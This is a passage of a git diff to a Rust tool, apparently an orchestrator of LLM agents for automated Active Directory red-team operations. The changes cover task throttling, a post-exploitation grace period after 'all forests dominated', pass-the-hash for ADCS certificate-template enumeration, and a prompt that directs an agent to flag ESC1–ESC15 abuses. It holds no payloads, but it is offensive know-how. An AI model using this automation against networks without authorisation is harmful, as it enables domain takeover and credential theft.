redis::cmd("HLEN").arg(&key).query_async(&mut conn).await +} + /// Extract forest root from a domain FQDN. /// /// For `north.contoso.local` → `contoso.local` @@ -206,10 +216,42 @@ pub async fn wait_for_completion( None // Continue — waiting for golden ticket } } else { - // Default: continue until all forests are dominated + // Default: continue until all forests are dominated, + // then allow a post-exploitation grace period for group/ACL/ADCS + // enumeration to complete. let remaining = undominated_forests(state).await; if remaining.is_empty() { - Some("all forests dominated") + // Grace period: continue for 180s after all forests dominated + // to allow post-exploitation automation (group enum, ACL + // discovery, ADCS enumeration) to fire and complete. + // 180s needed because: automations check on 20-60s intervals, + // domain hashes may arrive late, and LLM tasks need time to + // complete LDAP queries. + let inner = state.read().await; + let all_dominated_at = inner.all_forests_dominated_at; + drop(inner); + if let Some(dominated_at) = all_dominated_at { + let grace = Duration::from_secs(180); + let since = dominated_at.elapsed(); + if since >= grace { + Some("all forests dominated (post-exploitation complete)") + } else { + debug!( + remaining_secs = (grace - since).as_secs(), + "All forests dominated — post-exploitation grace period" + ); + None // Still in grace period + } + } else { + // First time we see all forests dominated — record the timestamp + let mut inner = state.write().await; + inner.all_forests_dominated_at = Some(tokio::time::Instant::now()); + drop(inner); + info!( + "All forests dominated — starting 90s post-exploitation grace period" + ); + None + } } else { debug!( undominated = ?remaining, @@ -303,6 +345,58 @@ pub async fn wait_for_completion( } } + // Wait for active red team tasks and deferred queue to drain + // before signalling shutdown. Cap at 5 minutes to avoid hanging. + let red_deadline = tokio::time::Instant::now() + Duration::from_secs(300); + loop { + if *shutdown_rx.borrow() { + info!("Completion monitor interrupted by shutdown while waiting for red team drain"); + break; + } + + if tokio::time::Instant::now() >= red_deadline { + warn!("Red team drain deadline reached (5m) — proceeding with shutdown"); + break; + } + + let active_tasks = dispatcher.tracker.total().await; + let deferred_tasks = dispatcher.deferred.total_count().await; + let redis_pending_tasks = match redis_pending_red_tasks(dispatcher).await { + Ok(count) => count, + Err(e) => { + warn!(err = %e, "Failed to read pending red task count from Redis"); + usize::MAX + } + }; + + if redis_pending_tasks == 0 && deferred_tasks == 0 { + if active_tasks != 0 { + warn!( + active_tasks, + "Local active-task tracker is non-zero, but Redis has no pending tasks; treating tracker entries as stale and proceeding with shutdown" + ); + } + info!("All red team tasks drained"); + break; + } + + info!( + active_tasks, + redis_pending_tasks, + deferred_tasks, + "Waiting for red team tasks to drain before shutdown..." + ); + + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(10)) => {} + _ = shutdown_rx.changed() => { + if *shutdown_rx.borrow() { + break; + } + } + } + } + // Signal the main loop to stop via Redis so it breaks out of its // select! within the next 5-second poll cycle. { diff --git a/ares-cli/src/orchestrator/config.rs b/ares-cli/src/orchestrator/config.rs index 1b467b58..357790d5 100644 --- a/ares-cli/src/orchestrator/config.rs +++ b/ares-cli/src/orchestrator/config.rs @@ -181,7 +181,7 @@ impl OrchestratorConfig { .ok() .or_else(|| detect_local_ip(target_ips.first().map(|s| s.as_str()))); - let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 8); + let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 12); let heartbeat_interval_secs = parse_env("ARES_HEARTBEAT_INTERVAL_SECS", 30); let heartbeat_timeout_secs = parse_env("ARES_HEARTBEAT_TIMEOUT_SECS", 120); let result_poll_interval_ms = parse_env("ARES_RESULT_POLL_INTERVAL_MS", 500); @@ -189,7 +189,7 @@ impl OrchestratorConfig { let deferred_poll_interval_secs = parse_env("ARES_DEFERRED_POLL_INTERVAL_SECS", 10); let max_tasks_per_role = parse_env("ARES_MAX_TASKS_PER_ROLE", 3); let dispatch_delay_ms = parse_env("ARES_DISPATCH_DELAY_MS", 200); - let stale_task_timeout_secs = parse_env("ARES_STALE_TASK_TIMEOUT_SECS", 900); + let stale_task_timeout_secs = parse_env("ARES_STALE_TASK_TIMEOUT_SECS", 300); let deferred_task_max_age_secs = parse_env("ARES_DEFERRED_TASK_MAX_AGE_SECS", 300); let max_deferred_per_type = parse_env("ARES_MAX_DEFERRED_PER_TYPE", 50); let max_deferred_total = parse_env("ARES_MAX_DEFERRED_TOTAL", 200); @@ -338,7 +338,7 @@ mod tests { std::env::set_var("ARES_OPERATION_ID", "test-op-1"); let c = OrchestratorConfig::from_env().unwrap(); assert_eq!(c.operation_id, "test-op-1"); - assert_eq!(c.max_concurrent_tasks, 8); + assert_eq!(c.max_concurrent_tasks, 12); assert_eq!(c.heartbeat_interval, Duration::from_secs(30)); assert!(c.target_ips.is_empty()); assert!(c.initial_credential.is_none()); diff --git a/ares-cli/src/orchestrator/deferred.rs b/ares-cli/src/orchestrator/deferred.rs index 48b1b111..0ade788b 100644 --- a/ares-cli/src/orchestrator/deferred.rs +++ b/ares-cli/src/orchestrator/deferred.rs @@ -194,6 +194,23 @@ impl DeferredQueue { Ok(total_evicted) } + /// Total number of deferred tasks across all type ZSETs. + pub async fn total_count(&self) -> usize { + let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id); + let mut conn = self.queue_conn(); + let keys: Vec = scan_keys_async(&mut conn, &pattern).await; + let mut total = 0_usize; + for key in &keys { + let count: usize = redis::cmd("ZCARD") + .arg(key) + .query_async(&mut conn) + .await + .unwrap_or(0); + total += count; + } + total + } + fn queue_conn(&self) -> redis::aio::ConnectionManager { // TaskQueue wraps a ConnectionManager which implements Clone cheaply // We access it through an internal method. diff --git a/ares-cli/src/orchestrator/dispatcher/mod.rs b/ares-cli/src/orchestrator/dispatcher/mod.rs index 347bb2c9..d6576403 100644 --- a/ares-cli/src/orchestrator/dispatcher/mod.rs +++ b/ares-cli/src/orchestrator/dispatcher/mod.rs @@ -69,6 +69,28 @@ impl CredentialInflight { } } +/// Result of a submission attempt that distinguishes between "deferred and +/// safely enqueued" vs "dropped due to overflow / no role mapping". +/// +/// Existing call sites use `throttled_submit` which collapses Deferred and +/// Dropped into `Ok(None)`. New automations that need to dedup deferred work +/// should use `throttled_submit_outcome` and only mark dedup on +/// `Submitted`/`Deferred`, never on `Dropped` (otherwise overflowed tasks are +/// lost forever and never retried by the deferred drain). +#[derive(Debug, Clone)] +pub enum SubmissionOutcome { + /// Task is running (LLM agent loop spawned). String is the task_id. + Submitted(String), + /// Task is in the deferred ZSET; the deferred processor will retry when + /// throttler/credential capacity opens up. + Deferred, + /// Task was lost: the deferred queue was at its per-type cap, or no role + /// mapping exists for the task_type/target_role. Caller MUST NOT mark this + /// item as dispatched; it will be re-considered on the next automation + /// tick when capacity is available. + Dropped, +} + /// Extract `"user@domain"` from a task payload's `credential` field. pub fn credential_key_from_payload(payload: &serde_json::Value) -> Option { let cred = payload.get("credential")?; diff --git a/ares-cli/src/orchestrator/dispatcher/submission.rs b/ares-cli/src/orchestrator/dispatcher/submission.rs index fd6d0acb..a977c511 100644 --- a/ares-cli/src/orchestrator/dispatcher/submission.rs +++ b/ares-cli/src/orchestrator/dispatcher/submission.rs @@ -16,7 +16,7 @@ use crate::orchestrator::throttling::ThrottleDecision; use ares_llm::LoopEndReason; -use super::Dispatcher; +use super::{Dispatcher, SubmissionOutcome}; impl Dispatcher { /// Submit a task with throttle checking. Returns the task_id if submitted, @@ -28,6 +28,26 @@ impl Dispatcher { payload: serde_json::Value, priority: i32, ) -> Result> { + match self + .throttled_submit_outcome(task_type, target_role, payload, priority) + .await? + { + SubmissionOutcome::Submitted(id) => Ok(Some(id)), + SubmissionOutcome::Deferred | SubmissionOutcome::Dropped => Ok(None), + } + } + + /// Like `throttled_submit` but returns a `SubmissionOutcome` distinguishing + /// "deferred and safely enqueued" from "dropped due to overflow". Use this + /// when the caller needs to dedup deferred work without losing tasks that + /// got silently dropped on queue overflow. + pub async fn throttled_submit_outcome( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + priority: i32, + ) -> Result { let decision = self .throttler .check(task_type, target_role, Some(&payload)) @@ -35,36 +55,14 @@ impl Dispatcher { match decision { ThrottleDecision::Allow => { - self.do_submit(task_type, target_role, payload, priority) + self.do_submit_outcome(task_type, target_role, payload, priority) .await } ThrottleDecision::Defer => { - let task = DeferredTask { - priority, - enqueue_time: Utc::now().timestamp() as f64, - task_type: task_type.to_string(), - target_role: target_role.to_string(), - payload, - source_agent: "orchestrator".to_string(), - }; - match self.deferred.enqueue(&task).await { - Ok(true) => { - debug!(task_type, target_role, "Task deferred"); - Ok(None) - } - Ok(false) => { - debug!(task_type, target_role, "Deferred queue full, task dropped"); - Ok(None) - } - Err(e) => { - warn!(err = %e, "Failed to defer task, attempting direct submit"); - self.do_submit(task_type, target_role, task.payload, priority) - .await - } - } + self.enqueue_deferred(task_type, target_role, payload, priority) + .await } ThrottleDecision::Wait(dur) => { - // Sleep and retry once tokio::time::sleep(dur).await; let retry_decision = self .throttler @@ -72,26 +70,68 @@ impl Dispatcher { .await; match retry_decision { ThrottleDecision::Allow => { - self.do_submit(task_type, target_role, payload, priority) + self.do_submit_outcome(task_type, target_role, payload, priority) .await } _ => { - let task = DeferredTask { - priority, - enqueue_time: Utc::now().timestamp() as f64, - task_type: task_type.to_string(), - target_role: target_role.to_string(), - payload, - source_agent: "orchestrator".to_string(), - }; - let _ = self.deferred.enqueue(&task).await; - Ok(None) + self.enqueue_deferred(task_type, target_role, payload, priority) + .await } } } } } + async fn enqueue_deferred( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + priority: i32, + ) -> Result { + let task = DeferredTask { + priority, + enqueue_time: Utc::now().timestamp() as f64, + task_type: task_type.to_string(), + target_role: target_role.to_string(), + payload, + source_agent: "orchestrator".to_string(), + }; + match self.deferred.enqueue(&task).await { + Ok(true) => { + debug!(task_type, target_role, "Task deferred"); + Ok(SubmissionOutcome::Deferred) + } + Ok(false) => { + warn!( + task_type, + target_role, "Deferred queue full, task dropped (will retry next tick)" + ); + Ok(SubmissionOutcome::Dropped) + } + Err(e) => { + warn!(err = %e, "Failed to defer task, attempting direct submit"); + self.do_submit_outcome(task_type, target_role, task.payload, priority) + .await + } + } + } + + /// Submit bypassing the throttle soft/hard cap. Used by automations + /// whose tasks are small (single LDAP query) and must not be blocked by + /// long-running initial recon. Still routes through `do_submit` which + /// respects the per-role semaphore. + pub async fn force_submit( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + priority: i32, + ) -> Result> { + self.do_submit(task_type, target_role, payload, priority) + .await + } + /// Direct submit (bypasses throttle). Returns task_id. /// /// Routes the task to the Rust LLM agent loop. Prefers `target_role` @@ -102,11 +142,25 @@ impl Dispatcher { task_type: &str, target_role: &str, payload: serde_json::Value, - _priority: i32, + priority: i32, ) -> Result> { - // Prefer the caller-specified target_role (from recommended_agent) - // over the static task_type → role mapping. This lets automation - // modules like MSSQL route exploits to lateral instead of privesc. + match self + .do_submit_outcome(task_type, target_role, payload, priority) + .await? + { + SubmissionOutcome::Submitted(id) => Ok(Some(id)), + SubmissionOutcome::Deferred | SubmissionOutcome::Dropped => Ok(None), + } + } + + /// Like `do_submit` but returns a `SubmissionOutcome`. + pub async fn do_submit_outcome( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + priority: i32, + ) -> Result { let role = ares_llm::tool_registry::AgentRole::parse(target_role) .or_else(|| crate::orchestrator::llm_runner::role_for_task_type(task_type)); @@ -118,7 +172,7 @@ impl Dispatcher { target_role = target_role, "No LLM role mapping for task type or target role, dropping" ); - return Ok(None); + return Ok(SubmissionOutcome::Dropped); } }; @@ -128,6 +182,7 @@ impl Dispatcher { target_role, role, payload, + priority, ) .await } @@ -142,26 +197,39 @@ impl Dispatcher { target_role: &str, role: ares_llm::tool_registry::AgentRole, payload: serde_json::Value, - ) -> Result> { + priority: i32, + ) -> Result { // Per-credential concurrency gate: if too many tasks are already // in-flight for this credential, defer instead of spawning another. let cred_key = super::credential_key_from_payload(&payload); if let Some(ref key) = cred_key { if !self.credential_inflight.try_acquire(key).await { - info!( + debug!( credential = key.as_str(), task_type, "Credential concurrency limit reached, deferring task" ); let task = DeferredTask { - priority: 3, + priority, enqueue_time: Utc::now().timestamp() as f64, task_type: task_type.to_string(), target_role: target_role.to_string(), payload, source_agent: "orchestrator".to_string(), }; - let _ = self.deferred.enqueue(&task).await; - return Ok(None); + return match self.deferred.enqueue(&task).await { + Ok(true) => Ok(SubmissionOutcome::Deferred), + Ok(false) => { + warn!( + credential = key.as_str(), + task_type, "Deferred queue full while gating on cred — task dropped" + ); + Ok(SubmissionOutcome::Dropped) + } + Err(e) => { + warn!(err = %e, "Failed to defer cred-gated task"); + Ok(SubmissionOutcome::Dropped) + } + }; } } @@ -184,6 +252,7 @@ impl Dispatcher { task_type: task_type.to_string(), role: target_role.to_string(), submitted_at: std::time::Instant::now(), + credential_key: cred_key.clone(), }) .await; @@ -208,6 +277,13 @@ impl Dispatcher { if let Some(ref key) = cred_key { task_params.insert("credential_key".to_string(), serde_json::json!(key)); } + // Propagate task metadata so process_completed_task can access them + // (mark_host_owned needs target_ip, domain attribution needs domain). + for key in &["target_ip", "domain"] { + if let Some(val) = payload.get(*key) { + task_params.insert(key.to_string(), val.clone()); + } + } let task_info = ares_core::models::TaskInfo { task_id: task_id.clone(), task_type: task_type.to_string(), @@ -235,8 +311,6 @@ impl Dispatcher { let queue = self.queue.clone(); let tid = task_id.clone(); let tt = task_type.to_string(); - let cred_inflight = self.credential_inflight.clone(); - let cred_key_owned = cred_key.clone(); tokio::spawn(async move { let outcome = runner.execute_task(&tt, &tid, role, &payload).await; @@ -253,11 +327,30 @@ impl Dispatcher { Some(ares_tools::parsers::merge_discoveries(&outcome.discoveries)) }; - // Collect raw tool outputs for secondary regex extraction + // LLM-fabricated findings (`report_finding`, + // `report_lateral_success`) are kept on a SEPARATE field so + // `extract_discoveries` (which only reads "discoveries") + // never feeds them into `publish_*` state writes. Reports + // surface them under `llm_findings` for context only. + let llm_findings_json: Option = if outcome.llm_findings.is_empty() { + None + } else { + Some(Value::Array(outcome.llm_findings.clone())) + }; + + // Collect raw tool outputs for secondary regex extraction. + // Serialize as objects {name, arguments, output} so consumers + // can be tool-aware (skip credential regex for hash-auth invocations). let tool_outputs_json: Vec = outcome .tool_outputs .iter() - .map(|s| Value::String(s.clone())) + .map(|to| { + serde_json::json!({ + "name": to.name, + "arguments": to.arguments, + "output": to.output, + }) + }) .collect(); match &outcome.reason { @@ -291,13 +384,18 @@ impl Dispatcher { // The LLM's task_complete result is untrusted prose — // any discovery-like keys it contains are ignored. // Only ares-tools parsers (run on real tool stdout) - // produce authoritative discoveries. + // produce authoritative discoveries. LLM-fabricated + // findings live on a separate `llm_findings` field. if let Some(obj) = result_json.as_object_mut() { obj.remove("discoveries"); + obj.remove("llm_findings"); } if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); @@ -320,6 +418,9 @@ impl Dispatcher { if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); @@ -344,6 +445,9 @@ impl Dispatcher { if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); @@ -363,15 +467,27 @@ impl Dispatcher { if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); } + // Bare end-of-turn means the LLM stopped without + // calling task_complete or request_assistance — it + // is a stall, not a success. Treating it as success + // lets capability-gap exits masquerade as + // accomplished objectives in run accounting. TaskResult { task_id: tid.clone(), - success: true, + success: false, result: Some(result_json), - error: None, + error: Some( + "Agent ended turn without task_complete or \ + request_assistance" + .into(), + ), completed_at: Some(Utc::now()), worker_pod: Some("rust-llm-runner".into()), agent_name: Some(tt.clone()), @@ -385,6 +501,9 @@ impl Dispatcher { if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); @@ -452,10 +571,12 @@ impl Dispatcher { } } - // Release per-credential concurrency slot - if let Some(ref key) = cred_key_owned { - cred_inflight.release(key).await; - } + // The CredentialInflight slot is released by whichever caller + // evicts this task from `ActiveTaskTracker` — either the result + // consumer when it picks up the result, or the stale-task + // cleanup when this future has hung past the timeout. That + // mirrors the slot to the tracker entry's lifetime, so a hung + // future doesn't pin the slot indefinitely. // Push result to the normal result queue so the result consumer picks it up if let Err(e) = queue.send_result(&tid, &result).await { @@ -467,6 +588,6 @@ impl Dispatcher { } }); - Ok(Some(task_id)) + Ok(SubmissionOutcome::Submitted(task_id)) } } diff --git a/ares-cli/src/orchestrator/dispatcher/task_builders.rs b/ares-cli/src/orchestrator/dispatcher/task_builders.rs index 06b8c01f..11cda875 100644 --- a/ares-cli/src/orchestrator/dispatcher/task_builders.rs +++ b/ares-cli/src/orchestrator/dispatcher/task_builders.rs @@ -4,7 +4,7 @@ use anyhow::Result; use serde_json::json; use tracing::{debug, info}; -use crate::orchestrator::state::DEDUP_SCANNED_TARGETS; +use crate::orchestrator::state::{DEDUP_CROSS_REALM_LATERAL, DEDUP_SCANNED_TARGETS}; use super::Dispatcher; @@ -219,12 +219,75 @@ impl Dispatcher { } /// Submit a lateral movement task. + /// + /// Refuses to dispatch when the credential's realm differs from the target + /// host's realm and no trust path is known — wrong-realm NTLM/Kerberos auth + /// against a foreign DC just returns ACCESS_DENIED and burns LLM tokens + /// (see the swarm of CHILD\dave → sql01.fabrikam.local failures). pub async fn request_lateral( &self, target_ip: &str, credential: &ares_core::models::Credential, technique: &str, ) -> Result> { + // Stable key shared with the cross-realm guard below so a rejection + // permanently suppresses retries from credential_expansion and the LLM. + let cross_realm_key = format!( + "{}|{}|{}|{}", + credential.domain.to_lowercase(), + credential.username.to_lowercase(), + target_ip, + technique + ); + + { + let state = self.state.read().await; + if state.is_processed(DEDUP_CROSS_REALM_LATERAL, &cross_realm_key) { + debug!( + target_ip = target_ip, + cred_user = %credential.username, + technique = technique, + "Skipping lateral — already rejected as cross-realm dead-end" + ); + return Ok(None); + } + } + + // Resolve target's realm from state.hosts (FQDN suffix). + let target_domain = { + let state = self.state.read().await; + state + .hosts + .iter() + .find(|h| h.ip == target_ip) + .and_then(|h| h.hostname.split_once('.').map(|(_, d)| d.to_lowercase())) + }; + if let Some(td) = target_domain { + let cd = credential.domain.to_lowercase(); + if !cd.is_empty() + && cd != td + && !td.ends_with(&format!(".{cd}")) + && !cd.ends_with(&format!(".{td}")) + { + tracing::warn!( + target_ip = %target_ip, + target_domain = %td, + cred_domain = %cd, + cred_user = %credential.username, + technique = %technique, + "Refusing cross-realm lateral movement — use forest_trust_escalation or get a same-realm credential first" + ); + { + let mut state = self.state.write().await; + state.mark_processed(DEDUP_CROSS_REALM_LATERAL, cross_realm_key.clone()); + } + let _ = self + .state + .persist_dedup(&self.queue, DEDUP_CROSS_REALM_LATERAL, &cross_realm_key) + .await; + return Ok(None); + } + } let payload = json!({ "technique": technique, "target_ip": target_ip, @@ -429,23 +492,78 @@ impl Dispatcher { } /// Submit a CERTIPY find task for ADCS enumeration. + /// + /// `ntlm_hash` and `hash_username` enable pass-the-hash authentication when + /// no cleartext credential is available for the target domain. pub async fn request_certipy_find( &self, target_ip: &str, domain: &str, credential: &ares_core::models::Credential, + ntlm_hash: Option<&str>, + hash_username: Option<&str>, + ca_host_ip: Option<&str>, ) -> Result> { - let payload = json!({ + // When PTH hash is available, use the hash user's identity for the target domain + let (cred_user, cred_pass, cred_domain) = if let Some(_hash) = ntlm_hash { + let user = hash_username.unwrap_or(&credential.username); + (user.to_string(), String::new(), domain.to_string()) + } else { + ( + credential.username.clone(), + credential.password.clone(), + credential.domain.clone(), + ) + }; + + let mut payload = json!({ "technique": "certipy_find", "target_ip": target_ip, "domain": domain, "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, + "username": cred_user, + "password": cred_pass, + "domain": cred_domain, }, + "instructions": concat!( + "Run the certipy_find tool with vulnerable=true to enumerate vulnerable ", + "certificate templates and CAs.\n\n", + "IMPORTANT: You MUST pass vulnerable=true to certipy_find. Without it, the ", + "output will not flag ESC vulnerabilities and no vulns will be registered.\n\n", + "AUTHENTICATION: If password is empty and an NTLM hash is provided, use the ", + "certipy_find tool with the 'hashes' parameter (format ':nthash'). Do NOT pass ", + "an empty password.\n\n", + "If a password IS provided, use certipy_find with 'password' parameter.\n\n", + "For each vulnerable template found, register a vulnerability with:\n", + " vuln_type: the ESC type (e.g. 'esc1', 'esc2', 'esc3', 'esc4', 'esc6', 'esc8', 'esc10', 'esc11', 'esc15')\n", + " target: the certificate template name\n", + " target_ip: the CA server IP\n", + " domain: the domain\n", + " details: include template_name, ca_name, enrollee_supplies_subject, ", + "client_authentication, any_purpose, enrollment_rights, and which users/groups can enroll\n\n", + "Check for: ESC1 (Enrollee Supplies Subject + Client Auth), ESC2 (Any Purpose EKU), ", + "ESC3 (enrollment agent), ESC4 (template ACL abuse), ESC6 (EDITF flag), ", + "ESC7 (ManageCA), ESC8 (Web Enrollment HTTP relay), ESC9 (UPN Spoofing), ", + "ESC10 (Weak Certificate Mapping / StrongCertificateBindingEnforcement=0), ", + "ESC11 (RPC enrollment relay / IF_ENFORCEENCRYPTICERTREQUEST disabled), ", + "ESC13 (Issuance Policy), ESC15 (Application Policy OID / CVE-2024-49019).\n", + "If certipy_find fails, try with -stdout flag." + ), }); - self.throttled_submit("recon", "recon", payload, 4).await + // Attach hash for PTH authentication + if let Some(hash) = ntlm_hash { + payload["ntlm_hash"] = json!(hash); + if let Some(user) = hash_username { + payload["hash_username"] = json!(user); + } + } + // CA host IP for parser to set correct vuln target + if let Some(ca_ip) = ca_host_ip { + payload["ca_host_ip"] = json!(ca_ip); + } + // task_type "recon" → recon prompt template (supports instructions/ntlm_hash) + // target_role "privesc" → privesc tools (certipy_find is only in privesc) + self.throttled_submit("recon", "privesc", payload, 4).await } /// Refresh the operation lock TTL. Called periodically. diff --git a/ares-cli/src/orchestrator/exploitation.rs b/ares-cli/src/orchestrator/exploitation.rs index 2e3ce418..698ac107 100644 --- a/ares-cli/src/orchestrator/exploitation.rs +++ b/ares-cli/src/orchestrator/exploitation.rs @@ -16,8 +16,30 @@ use tracing::{debug, info, warn}; use ares_core::models::VulnerabilityInfo; +use crate::orchestrator::automation::EXPLOITABLE_ESC_TYPES; use crate::orchestrator::dispatcher::Dispatcher; +fn is_automation_owned_vuln(vtype: &str) -> bool { + let vtype = vtype.to_lowercase(); + vtype == "constrained_delegation" + || vtype == "unconstrained_delegation" + || vtype == "rbcd" + || vtype == "child_to_parent" + || vtype == "forest_trust_escalation" + || vtype == "smb_signing_disabled" + || vtype == "ldap_signing_disabled" + || vtype == "ldap_signing_not_required" + || vtype == "ntlmv1_downgrade" + || vtype == "genericall" + || vtype == "genericwrite" + || vtype == "writedacl" + || vtype == "writeowner" + || vtype == "forcechangepassword" + || vtype == "self_membership" + || vtype == "write_membership" + || EXPLOITABLE_ESC_TYPES.contains(&vtype.as_str()) +} + /// Cooldown before re-dispatching a failed exploit for the same vulnerability. const EXPLOIT_RETRY_COOLDOWN: Duration = Duration::from_secs(120); @@ -67,20 +89,25 @@ pub async fn exploitation_workflow( // Try to pop the highest-priority vuln from the ZSET match pop_next_vuln(&dispatcher).await { Ok(Some(vuln)) => { - // Skip delegation vulns — s4u.rs handles these with proper - // credential checking and lockout-aware dispatch. The generic - // exploitation path falls back to wrong credentials and - // produces LLM errors with missing target_spn. + // Skip vulns owned by dedicated automation modules — the + // generic exploitation path picks the wrong worker role and + // falls back to wrong credentials, producing LLM errors: + // - delegation (constrained/unconstrained/rbcd) is handled + // by s4u.rs with credential checking and lockout-aware + // dispatch. + // - ADCS ESC types are handled by auto_adcs_exploitation, + // which routes each ESC variant to the correct role + // (e.g. coercion for ESC8/ESC11, privesc for ESC1/ESC4) + // via role_for_esc_type. Dropping them from the ZSET is + // safe because that automation reads from + // state.discovered_vulnerabilities, not the ZSET. { let vtype = vuln.vuln_type.to_lowercase(); - if vtype == "constrained_delegation" - || vtype == "unconstrained_delegation" - || vtype == "rbcd" - { + if is_automation_owned_vuln(&vtype) { debug!( vuln_id = %vuln.vuln_id, vuln_type = %vuln.vuln_type, - "Skipping delegation vuln (handled by s4u automation)" + "Skipping vuln handled by dedicated automation" ); continue; } @@ -106,6 +133,15 @@ pub async fn exploitation_workflow( } } + // Skip vulns that have crossed MAX_EXPLOIT_FAILURES — without this + // a stuck exploit (e.g. mssql_access with 0 creds in state) loops + // every cooldown for the entire op. The vuln is dropped from the + // queue, not re-enqueued. + if dispatcher.state.is_exploit_abandoned(&vuln.vuln_id).await { + debug!(vuln_id = %vuln.vuln_id, "Vuln abandoned (max failures), skipping"); + continue; + } + // Check dispatch cooldown to prevent rapid re-dispatch if let Some(last) = dispatched_at.get(&vuln.vuln_id) { if last.elapsed() < EXPLOIT_RETRY_COOLDOWN { @@ -208,3 +244,39 @@ async fn requeue_vuln(dispatcher: &Dispatcher, vuln: &VulnerabilityInfo) -> Resu let _: () = conn.zadd(&key, &json, score).await?; Ok(()) } + +#[cfg(test)] +mod tests { + use super::is_automation_owned_vuln; + + #[test] + fn automation_owned_vulns_are_skipped_by_generic_exploitation() { + for vtype in [ + "constrained_delegation", + "unconstrained_delegation", + "rbcd", + "child_to_parent", + "forest_trust_escalation", + "smb_signing_disabled", + "ldap_signing_disabled", + "ldap_signing_not_required", + "ntlmv1_downgrade", + "esc1", + ] { + assert!( + is_automation_owned_vuln(vtype), + "{vtype} should be automation-owned" + ); + } + } + + #[test] + fn generic_exploit_vulns_still_allowed() { + for vtype in ["mssql_access", "zerologon", "gpo_abuse"] { + assert!( + !is_automation_owned_vuln(vtype), + "{vtype} should remain generic" + ); + } + } +} diff --git a/ares-cli/src/orchestrator/llm_runner.rs b/ares-cli/src/orchestrator/llm_runner.rs index 039db0cb..dccae767 100644 --- a/ares-cli/src/orchestrator/llm_runner.rs +++ b/ares-cli/src/orchestrator/llm_runner.rs @@ -7,7 +7,7 @@ use std::sync::{Arc, OnceLock}; use anyhow::Result; -use tracing::{debug, info, warn}; +use tracing::{info, warn}; use ares_llm::prompt::templates; use ares_llm::prompt::StateSnapshot; @@ -31,6 +31,9 @@ pub struct LlmTaskRunner { /// Sorted technique priorities from strategy (technique, weight). /// Passed to the system prompt template to render a dynamic priority table. technique_priorities: Vec<(String, i32)>, + /// Orchestrator's relay/listener IP. Surfaced to the LLM in the system + /// prompt so it doesn't hallucinate a subnet-gateway IP for coercion args. + listener_ip: Option, /// Deferred callback handler — set after construction to break the /// `LlmTaskRunner → Dispatcher → LlmTaskRunner` circular dependency. callback_handler: OnceLock>, @@ -44,6 +47,7 @@ impl LlmTaskRunner { state: SharedState, temperature: Option, technique_priorities: Vec<(String, i32)>, + listener_ip: Option, ) -> Self { // Layer env-var overrides (ARES_AGENT_*, ARES_CONTEXT_*, ARES_BUDGET_*, // ARES_SESSION_LOG_*) on top of compiled defaults so operators can @@ -55,6 +59,7 @@ impl LlmTaskRunner { state, config, technique_priorities, + listener_ip, callback_handler: OnceLock::new(), } } @@ -91,7 +96,12 @@ impl LlmTaskRunner { let snapshot = self.state.snapshot().await; // 2. Build system prompt from agent template - let system_prompt = build_system_prompt(role, &snapshot, &self.technique_priorities)?; + let system_prompt = build_system_prompt( + role, + &snapshot, + &self.technique_priorities, + self.listener_ip.as_deref(), + )?; // 3. Build task prompt from Tera template + payload let task_prompt = build_task_prompt(task_type, task_id, payload, &snapshot)?; @@ -162,6 +172,7 @@ fn build_system_prompt( role: AgentRole, snapshot: &StateSnapshot, technique_priorities: &[(String, i32)], + listener_ip: Option<&str>, ) -> Result { // Get capabilities from the tool definitions for this role let tools = tool_registry::tools_for_role(role); @@ -188,7 +199,7 @@ fn build_system_prompt( } else { Some(technique_priorities) }; - let system_instructions = templates::render_system_instructions(None, priorities)?; + let system_instructions = templates::render_system_instructions(None, priorities, listener_ip)?; // Render agent-specific instructions let agent_instructions = templates::render_agent_instructions( @@ -273,10 +284,10 @@ fn log_outcome(task_id: &str, outcome: &AgentLoopOutcome) { ); } LoopEndReason::EndTurn { content } => { - debug!( + warn!( task_id = task_id, steps = outcome.steps, - "LLM agent ended turn: {content}" + "LLM agent ended turn without task_complete: {content}" ); } LoopEndReason::MaxTokens => { @@ -379,7 +390,7 @@ mod tests { AgentRole::Coercion, AgentRole::Orchestrator, ] { - let result = build_system_prompt(*role, &snapshot, &[]); + let result = build_system_prompt(*role, &snapshot, &[], None); assert!(result.is_ok(), "Failed for role: {:?}", role); let prompt = result.unwrap(); assert!(!prompt.is_empty(), "Empty prompt for role: {:?}", role); diff --git a/ares-cli/src/orchestrator/mod.rs b/ares-cli/src/orchestrator/mod.rs index 003bd7af..5184e9c7 100644 --- a/ares-cli/src/orchestrator/mod.rs +++ b/ares-cli/src/orchestrator/mod.rs @@ -153,43 +153,75 @@ async fn run_inner() -> Result<()> { // Seed domain_controllers from target IPs so automation tasks // (AS-REP roast, Kerberoast, BloodHound, delegation enum) can fire // immediately without waiting for recon to report back. - // Probe port 88 (Kerberos) to find a real DC, don't blindly use first IP. + // + // Probe ALL target IPs on port 88/389 to find every DC, then query + // each 